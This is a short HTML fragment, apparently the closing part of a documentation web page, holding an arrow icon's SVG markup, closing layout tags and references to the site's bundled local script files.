        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/80.8d47d1f7.js" defer></script>
  </body>
</html>